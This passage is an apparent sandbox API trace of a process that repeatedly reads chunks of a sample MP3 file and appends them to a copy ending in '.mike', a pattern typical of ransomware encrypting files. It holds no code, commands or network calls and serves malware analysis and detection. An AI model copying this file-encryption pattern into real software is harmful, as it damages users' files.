lpFileName="C:\\Users\\Public\\Music\\Sample Music\\Kalimba.mp3", nBufferLength=0x105, lpBuffer=0x2aeb38, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Public\\Music\\Sample Music\\Kalimba.mp3", lpFilePart=0x0) returned 0x2e [0160.591] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af02c) returned 1 [0160.591] CreateFileW (lpFileName="C:\\Users\\Public\\Music\\Sample Music\\Kalimba.mp3" (normalized: "c:\\users\\public\\music\\sample music\\kalimba.mp3"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x1c8 [0160.591] GetFileType (hFile=0x1c8) returned 0x1 [0160.591] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af028) returned 1 [0160.591] GetFileType (hFile=0x1c8) returned 0x1 [0160.591] SetFilePointer (in: hFile=0x1c8, lDistanceToMove=5601280, lpDistanceToMoveHigh=0x2af0bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af0bc*=0) returned 0x557800 [0160.591] ReadFile (in: hFile=0x1c8, lpBuffer=0x2149628, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af0c8, lpOverlapped=0x0 | out: lpBuffer=0x2149628*, lpNumberOfBytesRead=0x2af0c8*=0x2800, lpOverlapped=0x0) returned 1 [0160.592] CloseHandle (hObject=0x1c8) returned 1 [0160.592] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af03c) returned 1 [0160.592] CreateFileW (lpFileName="C:\\Users\\Public\\Music\\Sample Music\\Kalimba.mp3.mike" (normalized: "c:\\users\\public\\music\\sample music\\kalimba.mp3.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x1c8 [0160.592] GetFileType (hFile=0x1c8) returned 0x1 [0160.592] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af038) returned 1 [0160.592] GetFileType (hFile=0x1c8) returned 0x1 [0160.592] SetFilePointer (in: hFile=0x1c8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af010*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2af010*=0) returned 0x557a20 [0160.592] WriteFile (in: hFile=0x1c8, lpBuffer=0x2153b90*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x2af0dc, lpOverlapped=0x0 | out: lpBuffer=0x2153b90*, lpNumberOfBytesWritten=0x2af0dc*=0x2800, lpOverlapped=0x0) returned 1 [0160.593] CloseHandle (hObject=0x1c8) returned 1 [0160.593] GetFullPathNameW (in: lpFileName="C:\\Users\\Public\\Music\\Sample Music\\Kalimba.mp3", nBufferLength=0x105, lpBuffer=0x2aeb38, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Public\\Music\\Sample Music\\Kalimba.mp3", lpFilePart=0x0) returned 0x2e [0160.593] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af02c) returned 1 [0160.593] CreateFileW (lpFileName="C:\\Users\\Public\\Music\\Sample Music\\Kalimba.mp3" (normalized: "c:\\users\\public\\music\\sample music\\kalimba.mp3"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x1c8 [0160.593] GetFileType (hFile=0x1c8) returned 0x1 [0160.593] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af028) returned 1 [0160.593] GetFileType (hFile=0x1c8) returned 0x1 [0160.593] SetFilePointer (in: hFile=0x1c8, lDistanceToMove=5611520, lpDistanceToMoveHigh=0x2af0bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af0bc*=0) returned 0x55a000 [0160.593] ReadFile (in: hFile=0x1c8, lpBuffer=0x2156588, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af0c8, lpOverlapped=0x0 | out: lpBuffer=0x2156588*, lpNumberOfBytesRead=0x2af0c8*=0x2800, lpOverlapped=0x0) returned 1 [0160.594] CloseHandle (hObject=0x1c8) returned 1 [0160.594] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af03c) returned 1 [0160.595] CreateFileW (lpFileName="C:\\Users\\Public\\Music\\Sample Music\\Kalimba.mp3.mike" (normalized: "c:\\users\\public\\music\\sample music\\kalimba.mp3.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x1c8 [0160.595] GetFileType (hFile=0x1c8) returned 0x1 [0160.595] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af038) returned 1 [0160.595] GetFileType (hFile=0x1c8) returned 0x1 [0160.595] SetFilePointer (in: hFile=0x1c8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af010*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2af010*=0) returned 0x55a220 [0160.595] WriteFile (in: hFile=0x1c8, lpBuffer=0x2160af0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x2af0dc, lpOverlapped=0x0 | out: lpBuffer=0x2160af0*, lpNumberOfBytesWritten=0x2af0dc*=0x2800, lpOverlapped=0x0) returned 1 [0160.595] CloseHandle (hObject=0x1c8) returned 1 [0160.595] GetFullPathNameW (in: lpFileName="C:\\Users\\Public\\Music\\Sample Music\\Kalimba.mp3", nBufferLength=0x105, lpBuffer=0x2aeb38, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Public\\Music\\Sample Music\\Kalimba.mp3", lpFilePart=0x0) returned 0x2e [0160.595] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af02c) returned 1 [0160.595] CreateFileW (lpFileName="C:\\Users\\Public\\Music\\Sample Music\\Kalimba.mp3" (normalized: "c:\\users\\public\\music\\sample music\\kalimba.mp3"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x1c8 [0160.595] GetFileType (hFile=0x1c8) returned 0x1 [0160.596] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af028) returned 1 [0160.596] GetFileType (hFile=0x1c8) returned 0x1 [0160.596] SetFilePointer (in: hFile=0x1c8, lDistanceToMove=5621760, lpDistanceToMoveHigh=0x2af0bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af0bc*=0) returned 0x55c800 [0160.596] ReadFile (in: hFile=0x1c8, lpBuffer=0x21634e8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af0c8, lpOverlapped=0x0 | out: lpBuffer=0x21634e8*, lpNumberOfBytesRead=0x2af0c8*=0x2800, lpOverlapped=0x0) returned 1 [0160.596] CloseHandle (hObject=0x1c8) returned 1 [0160.597] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af03c) returned 1 [0160.597] CreateFileW (lpFileName="C:\\Users\\Public\\Music\\Sample Music\\Kalimba.mp3.mike" (normalized: "c:\\users\\public\\music\\sample music\\kalimba.mp3.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x1c8 [0160.597] GetFileType (hFile=0x1c8) returned 0x1 [0160.597] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af038) returned 1 [0160.597] GetFileType (hFile=0x1c8) returned 0x1 [0160.597] SetFilePointer (in: hFile=0x1c8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af010*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2af010*=0) returned 0x55ca20 [0160.597] WriteFile (in: hFile=0x1c8, lpBuffer=0x216da50*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x2af0dc, lpOverlapped=0x0 | out: lpBuffer=0x216da50*, lpNumberOfBytesWritten=0x2af0dc*=0x2800, lpOverlapped=0x0) returned 1 [0160.600] CloseHandle (hObject=0x1c8) returned 1 [0160.600] GetFullPathNameW (in: lpFileName="C:\\Users\\Public\\Music\\Sample Music\\Kalimba.mp3", nBufferLength=0x105, lpBuffer=0x2aeb38, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Public\\Music\\Sample Music\\Kalimba.mp3", lpFilePart=0x0) returned 0x2e [0160.600] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af02c) returned 1 [0160.600] CreateFileW (lpFileName="C:\\Users\\Public\\Music\\Sample Music\\Kalimba.mp3" (normalized: "c:\\users\\public\\music\\sample music\\kalimba.mp3"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x1c8 [0160.601] GetFileType (hFile=0x1c8) returned 0x1 [0160.601] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af028) returned 1 [0160.601] GetFileType (hFile=0x1c8) returned 0x1 [0160.601] SetFilePointer (in: hFile=0x1c8, lDistanceToMove=5632000, lpDistanceToMoveHigh=0x2af0bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af0bc*=0) returned 0x55f000 [0160.601] ReadFile (in: hFile=0x1c8, lpBuffer=0x2170448, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af0c8, lpOverlapped=0x0 | out: lpBuffer=0x2170448*, lpNumberOfBytesRead=0x2af0c8*=0x2800, lpOverlapped=0x0) returned 1 [0160.601] CloseHandle (hObject=0x1c8) returned 1 [0160.602] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af03c) returned 1 [0160.602] CreateFileW (lpFileName="C:\\Users\\Public\\Music\\Sample Music\\Kalimba.mp3.mike" (normalized: "c:\\users\\public\\music\\sample music\\kalimba.mp3.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x1c8 [0160.602] GetFileType (hFile=0x1c8) returned 0x1 [0160.602] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af038) returned 1 [0160.602] GetFileType (hFile=0x1c8) returned 0x1 [0160.602] SetFilePointer (in: hFile=0x1c8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af010*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2af010*=0) returned 0x55f220 [0160.602] WriteFile (in: hFile=0x1c8, lpBuffer=0x217a9b0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x2af0dc, lpOverlapped=0x0 | out: lpBuffer=0x217a9b0*, lpNumberOfBytesWritten=0x2af0dc*=0x2800, lpOverlapped=0x0) returned 1 [0160.603] CloseHandle (hObject=0x1c8) returned 1 [0160.603] GetFullPathNameW (in: lpFileName="C:\\Users\\Public\\Music\\Sample Music\\Kalimba.mp3", nBufferLength=0x105, lpBuffer=0x2aeb38, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Public\\Music\\Sample Music\\Kalimba.mp3", lpFilePart=0x0) returned 0x2e [0160.603] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af02c) returned 1 [0160.603] CreateFileW (lpFileName="C:\\Users\\Public\\Music\\Sample Music\\Kalimba.mp3" (normalized: "c:\\users\\public\\music\\sample music\\kalimba.mp3"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x1c8 [0160.603] GetFileType (hFile=0x1c8) returned 0x1 [0160.603] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af028) returned 1 [0160.603] GetFileType (hFile=0x1c8) returned 0x1 [0160.603] SetFilePointer (in: hFile=0x1c8, lDistanceToMove=5642240, lpDistanceToMoveHigh=0x2af0bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af0bc*=0) returned 0x561800 [0160.603] ReadFile (in: hFile=0x1c8, lpBuffer=0x217d3a8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af0c8, lpOverlapped=0x0 | out: lpBuffer=0x217d3a8*, lpNumberOfBytesRead=0x2af0c8*=0x2800, lpOverlapped=0x0) returned 1 [0160.604] CloseHandle (hObject=0x1c8) returned 1 [0160.604] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af03c) returned 1 [0160.605] CreateFileW (lpFileName="C:\\Users\\Public\\Music\\Sample Music\\Kalimba.mp3.mike" (normalized: "c:\\users\\public\\music\\sample music\\kalimba.mp3.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x1c8 [0160.605] GetFileType (hFile=0x1c8) returned 0x1 [0160.605] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af038) returned 1 [0160.605] GetFileType (hFile=0x1c8) returned 0x1 [0160.605] SetFilePointer (in: hFile=0x1c8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af010*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2af010*=0) returned 0x561a20 [0160.605] WriteFile (in: hFile=0x1c8, lpBuffer=0x2187910*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x2af0dc, lpOverlapped=0x0 | out: lpBuffer=0x2187910*, lpNumberOfBytesWritten=0x2af0dc*=0x2800, lpOverlapped=0x0) returned 1 [0160.605] CloseHandle (hObject=0x1c8) returned 1 [0160.605] GetFullPathNameW (in: lpFileName="C:\\Users\\Public\\Music\\Sample Music\\Kalimba.mp3", nBufferLength=0x105, lpBuffer=0x2aeb38, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Public\\Music\\Sample Music\\Kalimba.mp3", lpFilePart=0x0) returned 0x2e [0160.605] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af02c) returned 1 [0160.605] CreateFileW (lpFileName="C:\\Users\\Public\\Music\\Sample Music\\Kalimba.mp3" (normalized: "c:\\users\\public\\music\\sample music\\kalimba.mp3"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x1c8 [0160.605] GetFileType (hFile=0x1c8) returned 0x1 [0160.606] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af028) returned 1 [0160.606] GetFileType (hFile=0x1c8) returned 0x1 [0160.606] SetFilePointer (in: hFile=0x1c8, lDistanceToMove=5652480, lpDistanceToMoveHigh=0x2af0bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af0bc*=0) returned 0x564000 [0160.606] ReadFile (in: hFile=0x1c8, lpBuffer=0x218a308, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af0c8, lpOverlapped=0x0 | out: lpBuffer=0x218a308*, lpNumberOfBytesRead=0x2af0c8*=0x2800, lpOverlapped=0x0) returned 1 [0160.606] CloseHandle (hObject=0x1c8) returned 1 [0160.607] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af03c) returned 1 [0160.607] CreateFileW (lpFileName="C:\\Users\\Public\\Music\\Sample Music\\Kalimba.mp3.mike" (normalized: "c:\\users\\public\\music\\sample music\\kalimba.mp3.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x1c8 [0160.607] GetFileType (hFile=0x1c8) returned 0x1 [0160.607] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af038) returned 1 [0160.607] GetFileType (hFile=0x1c8) returned 0x1 [0160.607] SetFilePointer (in: hFile=0x1c8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af010*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2af010*=0) returned 0x564220 [0160.607] WriteFile (in: hFile=0x1c8, lpBuffer=0x2194870*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x2af0dc, lpOverlapped=0x0 | out: lpBuffer=0x2194870*, lpNumberOfBytesWritten=0x2af0dc*=0x2800, lpOverlapped=0x0) returned 1 [0160.608] CloseHandle (hObject=0x1c8) returned 1 [0160.608] GetFullPathNameW (in: lpFileName="C:\\Users\\Public\\Music\\Sample Music\\Kalimba.mp3", nBufferLength=0x105, lpBuffer=0x2aeb38, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Public\\Music\\Sample Music\\Kalimba.mp3", lpFilePart=0x0) returned 0x2e [0160.608] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af02c) returned 1 [0160.608] CreateFileW (lpFileName="C:\\Users\\Public\\Music\\Sample Music\\Kalimba.mp3" (normalized: "c:\\users\\public\\music\\sample music\\kalimba.mp3"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x1c8 [0160.608] GetFileType (hFile=0x1c8) returned 0x1 [0160.608] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af028) returned 1 [0160.608] GetFileType (hFile=0x1c8) returned 0x1 [0160.608] SetFilePointer (in: hFile=0x1c8, lDistanceToMove=5662720, lpDistanceToMoveHigh=0x2af0bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af0bc*=0) returned 0x566800 [0160.608] ReadFile (in: hFile=0x1c8, lpBuffer=0x2197268, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af0c8, lpOverlapped=0x0 | out: lpBuffer=0x2197268*, lpNumberOfBytesRead=0x2af0c8*=0x2800, lpOverlapped=0x0) returned 1 [0160.609] CloseHandle (hObject=0x1c8) returned 1 [0160.609] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af03c) returned 1 [0160.609] CreateFileW (lpFileName="C:\\Users\\Public\\Music\\Sample Music\\Kalimba.mp3.mike" (normalized: "c:\\users\\public\\music\\sample music\\kalimba.mp3.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x1c8 [0160.609] GetFileType (hFile=0x1c8) returned 0x1 [0160.609] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af038) returned 1 [0160.609] GetFileType (hFile=0x1c8) returned 0x1 [0160.609] SetFilePointer (in: hFile=0x1c8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af010*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2af010*=0) returned 0x566a20 [0160.610] WriteFile (in: hFile=0x1c8, lpBuffer=0x21a17d0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x2af0dc, lpOverlapped=0x0 | out: lpBuffer=0x21a17d0*, lpNumberOfBytesWritten=0x2af0dc*=0x2800, lpOverlapped=0x0) returned 1 [0160.610] CloseHandle (hObject=0x1c8) returned 1 [0160.610] GetFullPathNameW (in: lpFileName="C:\\Users\\Public\\Music\\Sample Music\\Kalimba.mp3", nBufferLength=0x105, lpBuffer=0x2aeb38, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Public\\Music\\Sample Music\\Kalimba.mp3", lpFilePart=0x0) returned 0x2e [0160.610] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af02c) returned 1 [0160.610] CreateFileW (lpFileName="C:\\Users\\Public\\Music\\Sample Music\\Kalimba.mp3" (normalized: "c:\\users\\public\\music\\sample music\\kalimba.mp3"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x1c8 [0160.610] GetFileType (hFile=0x1c8) returned 0x1 [0160.610] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af028) returned 1 [0160.610] GetFileType (hFile=0x1c8) returned 0x1 [0160.610] SetFilePointer (in: hFile=0x1c8, lDistanceToMove=5672960, lpDistanceToMoveHigh=0x2af0bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af0bc*=0) returned 0x569000 [0160.610] ReadFile (in: hFile=0x1c8, lpBuffer=0x21a41c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af0c8, lpOverlapped=0x0 | out: lpBuffer=0x21a41c8*, lpNumberOfBytesRead=0x2af0c8*=0x2800, lpOverlapped=0x0) returned 1 [0160.611] CloseHandle (hObject=0x1c8) returned 1 [0160.612] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af03c) returned 1 [0160.612] CreateFileW (lpFileName="C:\\Users\\Public\\Music\\Sample Music\\Kalimba.mp3.mike" (normalized: "c:\\users\\public\\music\\sample music\\kalimba.mp3.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x1c8 [0160.612] GetFileType (hFile=0x1c8) returned 0x1 [0160.612] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af038) returned 1 [0160.612] GetFileType (hFile=0x1c8) returned 0x1 [0160.612] SetFilePointer (in: hFile=0x1c8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af010*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2af010*=0) returned 0x569220 [0160.612] WriteFile (in: hFile=0x1c8, lpBuffer=0x21ae730*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x2af0dc, lpOverlapped=0x0 | out: lpBuffer=0x21ae730*, lpNumberOfBytesWritten=0x2af0dc*=0x2800, lpOverlapped=0x0) returned 1 [0160.612] CloseHandle (hObject=0x1c8) returned 1 [0160.612] GetFullPathNameW (in: lpFileName="C:\\Users\\Public\\Music\\Sample Music\\Kalimba.mp3", nBufferLength=0x105, lpBuffer=0x2aeb38, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Public\\Music\\Sample Music\\Kalimba.mp3", lpFilePart=0x0) returned 0x2e [0160.612] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af02c) returned 1 [0160.612] CreateFileW (lpFileName="C:\\Users\\Public\\Music\\Sample Music\\Kalimba.mp3" (normalized: "c:\\users\\public\\music\\sample music\\kalimba.mp3"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x1c8 [0160.613] GetFileType (hFile=0x1c8) returned 0x1 [0160.613] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af028) returned 1 [0160.613] GetFileType (hFile=0x1c8) returned 0x1 [0160.613] SetFilePointer (in: hFile=0x1c8, lDistanceToMove=5683200, lpDistanceToMoveHigh=0x2af0bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af0bc*=0) returned 0x56b800 [0160.613] ReadFile (in: hFile=0x1c8, lpBuffer=0x21b1128, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af0c8, lpOverlapped=0x0 | out: lpBuffer=0x21b1128*, lpNumberOfBytesRead=0x2af0c8*=0x2800, lpOverlapped=0x0) returned 1 [0160.613] CloseHandle (hObject=0x1c8) returned 1 [0160.614] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af03c) returned 1 [0160.614] CreateFileW (lpFileName="C:\\Users\\Public\\Music\\Sample Music\\Kalimba.mp3.mike" (normalized: "c:\\users\\public\\music\\sample music\\kalimba.mp3.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x1c8 [0160.614] GetFileType (hFile=0x1c8) returned 0x1 [0160.614] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af038) returned 1 [0160.614] GetFileType (hFile=0x1c8) returned 0x1 [0160.614] SetFilePointer (in: hFile=0x1c8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af010*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2af010*=0) returned 0x56ba20 [0160.614] WriteFile (in: hFile=0x1c8, lpBuffer=0x21bb690*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x2af0dc, lpOverlapped=0x0 | out: lpBuffer=0x21bb690*, lpNumberOfBytesWritten=0x2af0dc*=0x2800, lpOverlapped=0x0) returned 1 [0160.615] CloseHandle (hObject=0x1c8) returned 1 [0160.615] GetFullPathNameW (in: lpFileName="C:\\Users\\Public\\Music\\Sample Music\\Kalimba.mp3", nBufferLength=0x105, lpBuffer=0x2aeb38, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Public\\Music\\Sample Music\\Kalimba.mp3", lpFilePart=0x0) returned 0x2e [0160.615] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af02c) returned 1 [0160.615] CreateFileW (lpFileName="C:\\Users\\Public\\Music\\Sample Music\\Kalimba.mp3" (normalized: "c:\\users\\public\\music\\sample music\\kalimba.mp3"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x1c8 [0160.615] GetFileType (hFile=0x1c8) returned 0x1 [0160.615] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af028) returned 1 [0160.615] GetFileType (hFile=0x1c8) returned 0x1 [0160.615] SetFilePointer (in: hFile=0x1c8, lDistanceToMove=5693440, lpDistanceToMoveHigh=0x2af0bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af0bc*=0) returned 0x56e000 [0160.615] ReadFile (in: hFile=0x1c8, lpBuffer=0x21be088, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af0c8, lpOverlapped=0x0 | out: lpBuffer=0x21be088*, lpNumberOfBytesRead=0x2af0c8*=0x2800, lpOverlapped=0x0) returned 1 [0160.616] CloseHandle (hObject=0x1c8) returned 1 [0160.616] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af03c) returned 1 [0160.616] CreateFileW (lpFileName="C:\\Users\\Public\\Music\\Sample Music\\Kalimba.mp3.mike" (normalized: "c:\\users\\public\\music\\sample music\\kalimba.mp3.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x1c8 [0160.617] GetFileType (hFile=0x1c8) returned 0x1 [0160.617] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af038) returned 1 [0160.617] GetFileType (hFile=0x1c8) returned 0x1 [0160.617] SetFilePointer (in: hFile=0x1c8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af010*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2af010*=0) returned 0x56e220 [0160.617] WriteFile (in: hFile=0x1c8, lpBuffer=0x21c85f0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x2af0dc, lpOverlapped=0x0 | out: lpBuffer=0x21c85f0*, lpNumberOfBytesWritten=0x2af0dc*=0x2800, lpOverlapped=0x0) returned 1 [0160.617] CloseHandle (hObject=0x1c8) returned 1 [0160.617] GetFullPathNameW (in: lpFileName="C:\\Users\\Public\\Music\\Sample Music\\Kalimba.mp3", nBufferLength=0x105, lpBuffer=0x2aeb38, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Public\\Music\\Sample Music\\Kalimba.mp3", lpFilePart=0x0) returned 0x2e [0160.617] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af02c) returned 1 [0160.617] CreateFileW (lpFileName="C:\\Users\\Public\\Music\\Sample Music\\Kalimba.mp3" (normalized: "c:\\users\\public\\music\\sample music\\kalimba.mp3"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x1c8 [0160.617] GetFileType (hFile=0x1c8) returned 0x1 [0160.617] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af028) returned 1 [0160.617] GetFileType (hFile=0x1c8) returned 0x1 [0160.617] SetFilePointer (in: hFile=0x1c8, lDistanceToMove=5703680, lpDistanceToMoveHigh=0x2af0bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af0bc*=0) returned 0x570800 [0160.618] ReadFile (in: hFile=0x1c8, lpBuffer=0x21cafe8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af0c8, lpOverlapped=0x0 | out: lpBuffer=0x21cafe8*, lpNumberOfBytesRead=0x2af0c8*=0x2800, lpOverlapped=0x0) returned 1 [0160.618] CloseHandle (hObject=0x1c8) returned 1 [0160.619] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af03c) returned 1 [0160.619] CreateFileW (lpFileName="C:\\Users\\Public\\Music\\Sample Music\\Kalimba.mp3.mike" (normalized: "c:\\users\\public\\music\\sample music\\kalimba.mp3.mike"), dwDesiredAccess=0x40000000, 